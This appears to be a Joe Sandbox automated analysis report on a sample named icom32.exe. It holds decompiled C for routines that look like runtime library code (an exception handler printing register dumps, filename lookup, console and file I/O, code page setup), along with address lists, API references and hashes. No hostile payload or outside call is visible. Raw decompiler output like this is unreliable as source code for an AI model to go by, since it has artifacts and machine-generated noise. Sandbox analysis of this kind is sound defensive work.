        • Opcode ID: 741f407b4b878021d7c1669584926fbab229a44df92f37ffd3278c7f0eb23f0f
        • Instruction ID: 0c4ac13ef9e11472292295b197e2bc9d57cb47fc58576cf155ff2ce140d44433
        • Opcode Fuzzy Hash: 741f407b4b878021d7c1669584926fbab229a44df92f37ffd3278c7f0eb23f0f
        • Instruction Fuzzy Hash: 64016DB0A086019FE714AF35DD4571A77E0EB44310F14447EF445EA3C0EA78E881CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 100%
        			E004092B0() {
        				struct HINSTANCE__* _t5;
        				struct HINSTANCE__* _t13;
        
        				_t5 = LoadLibraryA("USER32.DLL");
        				if(_t5 != 0) {
        					_t5 = GetProcAddress(_t5, "GetActiveWindow");
        					_t13 = _t5;
        					if(_t5 == 0) {
        						goto L1;
        					} else {
        						return (_t13->i() & 0xffffff00 | _t8 != 0x00000000) & 0x000000ff;
        					}
        				} else {
        					L1:
        					return (_t5 & 0xffffff00 | 0 != 0x00000000) & 0x000000ff;
        				}
        			}





        0x004092b8
        0x004092c2
        0x004092d8
        0x004092de
        0x004092e2
        0x00000000
        0x004092e4
        0x004092f5
        0x004092f5
        0x004092c4
        0x004092c4
        0x004092d1
        0x004092d1

        APIs
        • LoadLibraryA.KERNEL32(USER32.DLL,?,?,?,0040939B), ref: 004092B8
        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004092D8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: GetActiveWindow$USER32.DLL
        • API String ID: 2574300362-2978834555
        • Opcode ID: aa41012e003614bac9598ee60c18d2c929128a918c9f109c6a35c13f7d6bb3f8
        • Instruction ID: bc7590957f1ab36f4a0bee8f8d6d4acc2858bef8492d8a203a67883a3a6befc2
        • Opcode Fuzzy Hash: aa41012e003614bac9598ee60c18d2c929128a918c9f109c6a35c13f7d6bb3f8
        • Instruction Fuzzy Hash: 26E04FB6305B036BF71416F66D96B37228C8FC4321724847AA400E41C1EE78DC545028
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 287 409360-40937e 288 409380-40938c 287->288 289 40938f-40939d call 4092b0 287->289 289->288 292 40939f-4093a7 call 40aaf0 289->292 292->288 295 4093a9-4093b4 292->295 296 409672 295->296 297 4093ba-4093bf 295->297 300 409751 296->300 301 409678-40967d 296->301 298 4093c5-4093ca 297->298 299 4096cf 297->299 302 4093d0-409459 call 409300 GetStdHandle WriteFile call 409300 GetStdHandle WriteFile 298->302 303 4096e2-4096e7 298->303 304 4096d1-4096d6 299->304 305 409729 299->305 315 40975b-409762 300->315 306 40969e 301->306 307 40967f-409684 301->307 334 4094c7-4094ce 302->334 335 40945b-4094c2 call 409300 * 6 302->335 311 40977d-40978b call 409300 303->311 312 4096ed-40970f call 409300 * 2 303->312 309 409733 304->309 310 4096d8 304->310 305->309 316 4096a4-4096a9 306->316 317 409747 306->317 313 40968a-40968e 307->313 314 40973d 307->314 309->314 310->303 333 409795-4097a1 311->333 312->315 340 409711-409718 312->340 321 409694 313->321 322 40971f 313->322 314->317 328 409769 315->328 323 409773 316->323 324 4096af-4096b4 316->324 317->300 321->306 322->305 323->311 324->328 329 4096ba-4096bf 324->329 328->323 329->311 332 4096c5 329->332 332->299 337 4094d0-409537 call 409300 * 6 334->337 338 40953c-409543 334->338 335->334 337->338 341 409545-409588 call 409300 * 4 338->341 342 40958d-4095c5 GetStdHandle WriteFile 338->342 340->322 341->342 347 409660-40966f 342->347 348 4095cb-4095df call 409300 342->348 356 4095e4-4095ea 348->356 356->333 360 4095f0-40960e call 409300 356->360 370 409610-409619 call 409300 360->370 371 40961e-409655 GetStdHandle WriteFile 360->371 370->371 371->347 377 409657-40965e 371->377 377->347 377->356
        C-Code - Quality: 96%
        			E00409360() {
        				void* __ebx;
        				signed int _t55;
        				void* _t57;
        				intOrPtr _t58;
        				char* _t59;
        				char* _t83;
        				signed int _t85;
        				intOrPtr _t132;
        				signed int _t135;
        				intOrPtr* _t156;
        				char* _t174;
        				char* _t177;
        				signed int _t205;
        				intOrPtr* _t206;
        				signed int* _t207;
        				signed int _t208;
        				char* _t209;
        
        				_t206 =  *((intOrPtr*)(_t209 + 0x118));
        				_t156 =  *_t206;
        				_t207 =  *(_t206 + 4);
        				if( *0x410655 == 0) {
        					 *0x410655 = 1;
        					_t55 = E004092B0();
        					__eflags = _t55;
        					if(_t55 != 0) {
        						goto L1;
        					} else {
        						_t57 = E0040AAF0();
        						__eflags = _t57 - 0xffffffff;
        						if(_t57 == 0xffffffff) {
        							goto L1;
        						} else {
        							 *_t209 = 0;
        							_t58 =  *_t156;
        							__eflags = _t58 - 0xc0000090;
        							if(__eflags >= 0) {
        								if(__eflags <= 0) {
        									_t174 = "The instruction at 0x00000000 caused an invalid operation floating point\nexception.\n";
        									goto L8;
        								} else {
        									__eflags = _t58 - 0xc0000093;
        									if(__eflags >= 0) {
        										if(__eflags <= 0) {
        											_t174 = "The instruction at 0x00000000 caused an underflow floating point exception.\n";
        											goto L8;
        										} else {
        											__eflags = _t58 - 0xc00000fd;
        											if(_t58 == 0xc00000fd) {
        												_t174 = "A stack overflow was encountered at address 0x00000000.\n";
        												goto L8;
        											} else {
        												__eflags = _t58 - 0xc0000096;
        												if(_t58 == 0xc0000096) {
        													_t174 = "A privileged instruction was executed at address 0x00000000.\n";
        													goto L8;
        												} else {
        													__eflags = _t58 - 0xc0000094;
        													if(_t58 != 0xc0000094) {
        														goto L49;
        													} else {
        														_t174 = "An integer divide by zero was encountered at address 0x00000000.\n";
        														goto L8;
        													}
        												}
        											}
        										}
        									} else {
        										__eflags = _t58 - 0xc0000092;
        										if(_t58 != 0xc0000092) {
        											_t174 = "The instruction at 0x00000000 caused an overflow floating point exception.\n";
        										} else {
        											__eflags = _t207[8] & 0x00000002;
        											if((_t207[8] & 0x00000002) == 0) {
        												_t174 = "The instruction at 0x00000000 caused a stack underflow floating point\nexception.\n";
        											} else {
        												_t174 = "The instruction at 0x00000000 caused a stack overflow floating point\nexception.\n";
        											}
        										}
        										goto L8;
        									}
        								}
        								L23:
        								return 1;
        								goto L51;
        							} else {
        								__eflags = _t58 - 0xc000008d;
        								if(__eflags >= 0) {
        									if(__eflags <= 0) {
        										_t174 = "The instruction at 0x00000000 caused a denormal operand floating point\nexception.\n";
        									} else {
        										__eflags = _t58 - 0xc000008f;
        										if(_t58 != 0xc000008f) {
        											_t174 = "The instruction at 0x00000000 caused a division by zero floating point\nexception.\n";
        										} else {
        											_t174 = "The instruction at 0x00000000 caused an inexact value floating point\nexception.\n";
        										}
        									}
        									goto L8;
        								} else {
        									__eflags = _t58 - 0xc000001d;
        									if(_t58 != 0xc000001d) {
        										__eflags = _t58 - 0xc0000005;
        										if(_t58 != 0xc0000005) {
        											L49:
        											E00409300(_t209,  *_t156, "The program encountered exception 0x00000000 at ");
        											_t174 = "address 0x00000000 and\ncannot continue.\n";
        											goto L8;
        										} else {
        											E00409300(_t209,  *((intOrPtr*)(_t156 + 0xc)), "The instruction at 0x00000000 referenced memory ");
        											E00409300(_t209,  *((intOrPtr*)(_t156 + 0x18)), "at 0x00000000.\nThe memory could not be ");
        											__eflags =  *(_t156 + 0x14);
        											if( *(_t156 + 0x14) != 0) {
        												_t174 = "written.\n";
        												_t59 = _t209;
        												_t132 = 0;
        											} else {
        												_t174 = "read.\n";
        												_t59 = _t209;
        												_t132 = 0;
        											}
        											goto L9;
        										}
        										goto L51;
        									} else {
        										_t174 = "An illegal instruction was executed at address 0x00000000.\n";
        										L8:
        										_t59 = _t209;
        										_t132 =  *((intOrPtr*)(_t156 + 0xc));
        									}
        								}
        							}
        							L9:
        							E00409300(_t59, _t132, _t174);
        							asm("repne scasb");
        							WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
        							 *_t209 = 0;
        							E00409300(_t209, E00409360, "Exception fielded by 0x00000000\n");
        							asm("repne scasb");
        							WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
        							 *_t209 = 0;
        							__eflags =  *_t207 & 0x00010002;
        							if(( *_t207 & 0x00010002) != 0) {
        								E00409300(_t209, _t207[0x2c], "EAX=0x00000000 ");
        								E00409300(_t209, _t207[0x29], "EBX=0x00000000 ");
        								E00409300(_t209, _t207[0x2b], "ECX=0x00000000 ");
        								E00409300(_t209, _t207[0x2a], "EDX=0x00000000\n");
        								E00409300(_t209, _t207[0x28], "ESI=0x00000000 ");
        								E00409300(_t209, _t207[0x27], "EDI=0x00000000 ");
        							}
        							__eflags =  *_t207 & 0x00010001;
        							if(( *_t207 & 0x00010001) != 0) {
        								E00409300(_t209, _t207[0x2d], "EBP=0x00000000 ");
        								E00409300(_t209, _t207[0x31], "ESP=0x00000000\n");
        								E00409300(_t209, _t207[0x2e], "EIP=0x00000000 ");
        								E00409300(_t209, _t207[0x30], "EFL=0x00000000 ");
        								E00409300(_t209, _t207[0x2f], "CS =0x00000000 ");
        								E00409300(_t209, _t207[0x32], "SS =0x00000000\n");
        							}
        							__eflags =  *_t207 & 0x00010004;
        							if(( *_t207 & 0x00010004) != 0) {
        								E00409300(_t209, _t207[0x26], "DS =0x00000000 ");
        								E00409300(_t209, _t207[0x25], "ES =0x00000000 ");
        								E00409300(_t209, _t207[0x24], "FS =0x00000000 ");
        								E00409300(_t209, _t207[0x23], "GS =0x00000000\n");
        							}
        							asm("repne scasb");
        							WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
        							 *_t209 = 0;
        							__eflags =  *_t207 & 0x00010001;
        							if(( *_t207 & 0x00010001) != 0) {
        								_t205 = 1;
        								__eflags = 0;
        								_t208 = _t207[0x31];
        								E00409300(_t209, 0, "Stack dump (SS:ESP)\n");
        								while(1) {
        									__eflags = _t208 & 0x0000ffff;
        									if((_t208 & 0x0000ffff) != 0) {
        										_t177 = "0x00000000 ";
        										_t135 =  *[ss:eax];
        										_t83 = _t209;
        									} else {
        										_t177 = "-stack end\n";
        										_t83 = _t209;
        										_t135 = 0;
        										__eflags = 0;
        									}
        									E00409300(_t83, _t135, _t177);
        									_t85 = _t205;
        									__eflags = _t85 % 6;
        									if(_t85 % 6 == 0) {
        										__eflags = 0;
        										E00409300(_t209, 0, 0x409289);
        									}
        									asm("repne scasb");
        									WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
        									 *_t209 = 0;
        									__eflags = _t208 & 0x0000ffff;
        									if((_t208 & 0x0000ffff) == 0) {
        										goto L23;
        									}
        									_t205 = _t205 + 1;
        									_t208 = _t208 + 4;
        									__eflags = _t205 - 0x48;
        									if(_t205 <= 0x48) {
        										continue;
        									}
        									goto L23;
        								}
        							}
        							goto L23;
        						}
        					}
        				} else {
        					L1:
        					return 0;
        				}
        				L51:
        			}




















        0x0040936a
        0x00409371
        0x00409374
        0x0040937e
        0x0040938f
        0x00409396
        0x0040939b
        0x0040939d
        0x00000000
        0x0040939f
        0x0040939f
        0x004093a4
        0x004093a7
        0x00000000
        0x004093a9
        0x004093a9
        0x004093ad
        0x004093af
        0x004093b4
        0x00409672
        0x00409751
        0x00000000
        0x00409678
        0x00409678
        0x0040967d
        0x0040969e
        0x00409747
        0x00000000
        0x004096a4
        0x004096a4
        0x004096a9
        0x00409773
        0x00000000
        0x004096af
        0x004096af
        0x004096b4
        0x00409769
        0x00000000
        0x004096ba
        0x004096ba
        0x004096bf
        0x00000000
        0x004096c5
        0x004096c5
        0x00000000
        0x004096c5
        0x004096bf
        0x004096b4
        0x004096a9
        0x0040967f
        0x0040967f
        0x00409684
        0x0040973d
        0x0040968a
        0x0040968a
        0x0040968e
        0x0040971f
        0x00409694
        0x00409694
        0x00409694
        0x0040968e
        0x00000000
        0x00409684
        0x0040967d
        0x00409660
        0x0040966f
        0x00000000
        0x004093ba
        0x004093ba
        0x004093bf
        0x004096cf
        0x00409729
        0x004096d1
        0x004096d1
        0x004096d6
        0x00409733
        0x004096d8
        0x004096d8
        0x004096d8
        0x004096d6
        0x00000000
        0x004093c5
        0x004093c5
        0x004093ca
        0x004096e2
        0x004096e7
        0x0040977d
        0x00409786
        0x0040978b
        0x00000000
        0x004096ed
        0x004096f7
        0x00409706
        0x0040970b
        0x0040970f
        0x0040975b
        0x00409760
        0x00409762
        0x00409711
        0x00409711
        0x00409716
        0x00409718
        0x00409718
        0x00000000
        0x0040970f
        0x00000000
        0x004093d0
        0x004093d0
        0x004093d5
        0x004093d5
        0x004093d7
        0x004093d7
        0x004093ca
        0x004093bf
        0x004093da
        0x004093da
        0x004093f2
        0x0040940b
        0x00409418
        0x0040941c
        0x00409434
        0x00409448
        0x0040944e
        0x00409452
        0x00409459
        0x00409468
        0x0040947a
        0x0040948c
        0x0040949e
        0x004094b0
        0x004094c2
        0x004094c2
        0x004094c7
        0x004094ce
        0x004094dd
        0x004094ef
        0x00409501
        0x00409513
        0x00409525
        0x00409537
        0x00409537
        0x0040953c
        0x00409543
        0x00409552
        0x00409564
        0x00409576
        0x00409588
        0x00409588
        0x004095a0
        0x004095b4
        0x004095ba
        0x004095be
        0x004095c5
        0x004095d2
        0x004095d7
        0x004095d9
        0x004095df
        0x004095e4
        0x004095e4
        0x004095ea
        0x00409797
        0x0040979f
        0x004097a1
        0x004095f0
        0x004095f0
        0x004095f5
        0x004095f7
        0x004095f7
        0x004095f7
        0x004095f9
        0x00409605
        0x0040960c
        0x0040960e
        0x00409617
        0x00409619
        0x00409619
        0x00409631
        0x00409645
        0x0040964b
        0x0040964f
        0x00409655
        0x00000000
        0x00000000
        0x00409657
        0x00409658
        0x0040965b
        0x0040965e
        0x00000000
        0x00000000
        0x00000000
        0x0040965e
        0x004095e4
        0x00000000
        0x004095c5
        0x004093a7
        0x00409380
        0x00409380
        0x0040938c
        0x0040938c
        0x00000000

        APIs
        • GetStdHandle.KERNEL32(000000F4,?,?,?,00000000), ref: 004093FF
        • WriteFile.KERNEL32(00000000,?,?,00000000), ref: 0040940B
        • GetStdHandle.KERNEL32(000000F4,?,?,?,00000000,?,?,00000000), ref: 00409441
        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00409448
        Strings
        • ESP=0x00000000, xrefs: 004094E2
        • FS =0x00000000 , xrefs: 00409569
        • at 0x00000000.The memory could not be , xrefs: 004096FC
        • written., xrefs: 0040975B
        • An integer divide by zero was encountered at address 0x00000000., xrefs: 004096C5
        • The program encountered exception 0x00000000 at , xrefs: 0040977D
        • EBP=0x00000000 , xrefs: 004094D0
        • EBX=0x00000000 , xrefs: 0040946D
        • -stack end, xrefs: 004095F0
        • GS =0x00000000, xrefs: 0040957B
        • The instruction at 0x00000000 caused an invalid operation floating pointexception., xrefs: 00409751
        • ESI=0x00000000 , xrefs: 004094A3
        • The instruction at 0x00000000 caused an overflow floating point exception., xrefs: 0040973D
        • EDI=0x00000000 , xrefs: 004094B5
        • 0x00000000 , xrefs: 00409797
        • An illegal instruction was executed at address 0x00000000., xrefs: 004093D0
        • EDX=0x00000000, xrefs: 00409491
        • The instruction at 0x00000000 caused an inexact value floating pointexception., xrefs: 004096D8
        • CS =0x00000000 , xrefs: 00409518
        • address 0x00000000 andcannot continue., xrefs: 0040978B
        • The instruction at 0x00000000 caused a stack overflow floating pointexception., xrefs: 00409694
        • Stack dump (SS:ESP), xrefs: 004095CB
        • ES =0x00000000 , xrefs: 00409557
        • The instruction at 0x00000000 referenced memory , xrefs: 004096ED
        • EAX=0x00000000 , xrefs: 0040945B
        • A privileged instruction was executed at address 0x00000000., xrefs: 00409769
        • DS =0x00000000 , xrefs: 00409545
        • SS =0x00000000, xrefs: 0040952A
        • The instruction at 0x00000000 caused an underflow floating point exception., xrefs: 00409747
        • ECX=0x00000000 , xrefs: 0040947F
        • read., xrefs: 00409711
        • The instruction at 0x00000000 caused a denormal operand floating pointexception., xrefs: 00409729
        • EIP=0x00000000 , xrefs: 004094F4
        • The instruction at 0x00000000 caused a stack underflow floating pointexception., xrefs: 0040971F
        • Exception fielded by 0x00000000, xrefs: 00409411
        • A stack overflow was encountered at address 0x00000000., xrefs: 00409773
        • The instruction at 0x00000000 caused a division by zero floating pointexception., xrefs: 00409733
        • EFL=0x00000000 , xrefs: 00409506
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: FileHandleWrite
        • String ID: -stack end$0x00000000 $A privileged instruction was executed at address 0x00000000.$A stack overflow was encountered at address 0x00000000.$An illegal instruction was executed at address 0x00000000.$An integer divide by zero was encountered at address 0x00000000.$CS =0x00000000 $DS =0x00000000 $EAX=0x00000000 $EBP=0x00000000 $EBX=0x00000000 $ECX=0x00000000 $EDI=0x00000000 $EDX=0x00000000$EFL=0x00000000 $EIP=0x00000000 $ES =0x00000000 $ESI=0x00000000 $ESP=0x00000000$Exception fielded by 0x00000000$FS =0x00000000 $GS =0x00000000$SS =0x00000000$Stack dump (SS:ESP)$The instruction at 0x00000000 caused a denormal operand floating pointexception.$The instruction at 0x00000000 caused a division by zero floating pointexception.$The instruction at 0x00000000 caused a stack overflow floating pointexception.$The instruction at 0x00000000 caused a stack underflow floating pointexception.$The instruction at 0x00000000 caused an inexact value floating pointexception.$The instruction at 0x00000000 caused an invalid operation floating pointexception.$The instruction at 0x00000000 caused an overflow floating point exception.$The instruction at 0x00000000 caused an underflow floating point exception.$The instruction at 0x00000000 referenced memory $The program encountered exception 0x00000000 at $address 0x00000000 andcannot continue.$at 0x00000000.The memory could not be $read.$written.
        • API String ID: 3320372497-1331860362
        • Opcode ID: 2370f7ff0e9524ec2c7466c72c9f395cdbc0b9cd2ed08f21228a73ba10d985ae
        • Instruction ID: abc709cd5361f47345cf2dc754c71f6acf8804fbb7e02d2d748819ffcd3c9898
        • Opcode Fuzzy Hash: 2370f7ff0e9524ec2c7466c72c9f395cdbc0b9cd2ed08f21228a73ba10d985ae
        • Instruction Fuzzy Hash: 06A180313142449BD724AA28CD95BAB33559B88314F20C53BF945BB7D7CB7C9C42CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 100%
        			E00408BF0(struct HINSTANCE__* __eax, int __ebx, short* __edx) {
        				CHAR* _t9;
        				int _t14;
        				char* _t21;
        				short* _t24;
        				struct HINSTANCE__* _t25;
        
        				_t25 = __eax;
        				_t24 = __edx;
        				if(GetVersion() >> 0x10 < 0x8000) {
        					return GetModuleFileNameW(_t25, _t24, __ebx);
        				} else {
        					_t9 = E00405700(0x208);
        					_t21 = _t9;
        					if(_t9 != 0) {
        						if(GetModuleFileNameA(_t25, _t9, 0x208) == 0) {
        							E00405860(_t21);
        							return 0;
        						} else {
        							_t14 = MultiByteToWideChar(1, 1, _t21, 0xffffffff, _t24, __ebx);
        							E00405860(_t21);
        							if(_t14 != 0) {
        								 *((short*)(_t24 + __ebx * 2 - 2)) = 0;
        								return E0040AA0D(_t24);
        							} else {
        								return 0;
        							}
        						}
        					} else {
        						return _t9;
        					}
        				}
        			}








        0x00408bf4
        0x00408bf6
        0x00408c07
        0x00408c2b
        0x00408c09
        0x00408c0e
        0x00408c13
        0x00408c17
        0x00408c3b
        0x00408c62
        0x00408c6d
        0x00408c3d
        0x00408c46
        0x00408c50
        0x00408c57
        0x00408c70
        0x00408c80
        0x00408c59
        0x00408c5f
        0x00408c5f
        0x00408c57
        0x00408c1d
        0x00408c1d
        0x00408c1d
        0x00408c17

        APIs
        • GetVersion.KERNEL32(?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408BFA
        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\icom32.exe,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108), ref: 00408C21
        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108), ref: 00408C33
        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,000000FF,C:\Users\user\Desktop\icom32.exe,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40), ref: 00408C46
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: FileModuleName$ByteCharMultiVersionWide
        • String ID: C:\Users\user\Desktop\icom32.exe
        • API String ID: 1868407593-2353288122
        • Opcode ID: bd26cdd842f5ce9db5bc70b6ce29cebca7aacf01639f56fd4a212c139b7e4937
        • Instruction ID: 682ea217144ef9e17e117eae914da8b79ce349e1dda49d29665941b9c0893443
        • Opcode Fuzzy Hash: bd26cdd842f5ce9db5bc70b6ce29cebca7aacf01639f56fd4a212c139b7e4937
        • Instruction Fuzzy Hash: 8001D2333062085AE71032BE6D0CEABB798CB81773B10467BF646E56C2DE79881042B8
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 399 40aa60-40aa71 401 40aa73-40aa7a 399->401 402 40aa87-40aaa9 CreateFileA 399->402 403 40aaab-40aad7 CreateFileA 401->403 404 40aa7c-40aa86 401->404 402->401
        APIs
        • CreateFileA.KERNEL32(conin$,80000000,00000001,00000000,00000003,00000080,00000000,?,?,0040AAF5,004093A4), ref: 0040AA9E
        • CreateFileA.KERNEL32(conout$,40000000,00000002,00000000,00000003,00000080,00000000,?,?,0040AAF5,004093A4), ref: 0040AAC2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: CreateFile
        • String ID: conin$$conout$
        • API String ID: 823142352-2896197411
        • Opcode ID: 2c1829fd7a500fa5c22cd5ec2cde23f67342dd19cf146a907d6e8ba81a172e90
        • Instruction ID: ae2b7705fe4284713e848ac2ea8f4b133303a11b1e87af0c2ef50c1b0f87a402
        • Opcode Fuzzy Hash: 2c1829fd7a500fa5c22cd5ec2cde23f67342dd19cf146a907d6e8ba81a172e90
        • Instruction Fuzzy Hash: CFF01D70790300BAE6348F34BE0EF153650A384B25F308A36F252B84F1D7B5256ACA1D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 61%
        			E0040A500(void* __eax, long __ebx, void* __edx) {
        				void* _v20;
        				long _v24;
        				void* _t10;
        				long _t21;
        				long _t28;
        				void* _t32;
        				void* _t35;
        				long _t37;
        				long _t38;
        				void* _t39;
        				void* _t40;
        				void* _t42;
        
        				_t6 = __eax;
        				_t39 = __eax;
        				_t40 = __edx;
        				_t38 = __ebx;
        				if(__eax < 0) {
        					L10:
        					E0040A1BE(4);
        					return 0xffffffff;
        				}
        				_t42 = _t6 -  *0x40f608; // 0x14
        				if(_t42 >= 0) {
        					goto L10;
        				}
        				_t10 = E004089F0(__eax);
        				_t35 = _t10;
        				_v20 = _t10;
        				_t32 = 0;
        				if((E0040A740(_t39) & 0x00000080) != 0) {
        					 *0x40f518();
        					_t32 = 1;
        					if(SetFilePointer(_t35, 0, 0, 2) == 0xffffffff) {
        						_t28 = GetLastError();
        						 *0x40f51c();
        						_t21 = _t28;
        						L8:
        						return E0040C500(_t21);
        					}
        				}
        				if(WriteFile(_v20, _t40, _t38,  &_v24, 0) == 0) {
        					_t37 = GetLastError();
        					if(_t32 == 1) {
        						 *0x40f51c();
        					}
        					_t21 = _t37;
        					goto L8;
        				}
        				if(_t38 != _v24) {
        					E0040A1BE(0xc);
        				}
        				if(_t32 == 1) {
        					 *0x40f51c();
        				}
        				return _v24;
        			}















        0x0040a500
        0x0040a507
        0x0040a509
        0x0040a50b
        0x0040a50f
        0x0040a594
        0x0040a599
        0x00000000
        0x0040a59e
        0x0040a515
        0x0040a51b
        0x00000000
        0x00000000
        0x0040a521
        0x0040a526
        0x0040a528
        0x0040a52e
        0x0040a537
        0x0040a53b
        0x0040a548
        0x0040a556
        0x0040a5a5
        0x0040a5af
        0x0040a5b5
        0x0040a587
        0x00000000
        0x0040a587
        0x0040a556
        0x0040a56e
        0x0040a576
        0x0040a57b
        0x0040a57f
        0x0040a57f
        0x0040a585
        0x00000000
        0x0040a585
        0x0040a5bc
        0x0040a5c3
        0x0040a5c3
        0x0040a5cb
        0x0040a5cf
        0x0040a5cf
        0x0040a5df

        APIs
        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,004054EC,?), ref: 0040A54D
        • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,004054EC,?), ref: 0040A566
        • GetLastError.KERNEL32(?,004054EC,?), ref: 0040A570
        • GetLastError.KERNEL32(?,00000000,00000000,00000002,?,004054EC,?), ref: 0040A5A5
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: ErrorFileLast$PointerWrite
        • String ID:
        • API String ID: 2977825765-0
        • Opcode ID: e2327df56d040c3c9ccd6519c96d93ea8b5cc4435d196c8a23b30d7d43f843d1
        • Instruction ID: a96a09f368e57a1ecaa03160b6809e64ce3bd243fbffe587f432beae5a678c93
        • Opcode Fuzzy Hash: e2327df56d040c3c9ccd6519c96d93ea8b5cc4435d196c8a23b30d7d43f843d1
        • Instruction Fuzzy Hash: 9E21A275300300ABC320AB79AD4975E77A4AB85715F10493AF905FB3D1EA39EC2A476F
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 41%
        			E0040A45E() {
        				void* __edx;
        				int _t26;
        				int _t28;
        				void* _t32;
        				void* _t42;
        
        				asm("enter 0x14, 0x0");
        				_t28 = 0;
        				if(0 != 0xffffffff) {
        					if(0 != 0xfffffffe) {
        						if(0 != 0xfffffffd) {
        							if(0 != 0xfffffffc) {
        								goto L10;
        							} else {
        								E0040C3C4();
        								E0040C3AC(0x81, 0x9f);
        								E0040C3AC(0xe0, 0xfc);
        								 *0x410668 = 1;
        								 *0x40f78c = 0x3a4;
        								goto L23;
        							}
        						} else {
        							E0040C3C4();
        							goto L23;
        						}
        					} else {
        						_t26 = GetOEMCP();
        						goto L3;
        					}
        				} else {
        					_t26 = GetACP();
        					L3:
        					_t28 = _t26;
        					L10:
        					if(_t28 == 0) {
        						_t28 = 1;
        					}
        					if(GetCPInfo(_t28, _t42 - 0x14) != 0) {
        						E0040C3C4();
        						if( *((char*)(_t42 - 0xe)) != 0) {
        							 *0x410668 = 1;
        						}
        						_t32 = 0;
        						while( *(_t32 + _t42 - 0xe) != 0 ||  *(_t32 + _t42 - 0xd) != 0) {
        							E0040C3AC( *(_t32 + _t42 - 0xe) & 0x000000ff,  *(_t32 + _t42 - 0xd) & 0x000000ff);
        							_t32 = _t32 + 2;
        						}
        						if(_t28 != 1) {
        							 *0x40f78c = _t28;
        						} else {
        							 *0x40f78c = GetOEMCP();
        						}
        						L23:
        						return 0;
        					} else {
        						return 1;
        					}
        				}
        			}








        0x0040c3e9
        0x0040c3ed
        0x0040c3f2
        0x0040c401
        0x0040c40e
        0x0040c41d
        0x00000000
        0x0040c41f
        0x0040c41f
        0x0040c42e
        0x0040c43d
        0x0040c442
        0x0040c44c
        0x00000000
        0x0040c44c
        0x0040c410
        0x0040c410
        0x00000000
        0x0040c410
        0x0040c403
        0x0040c403
        0x00000000
        0x0040c403
        0x0040c3f4
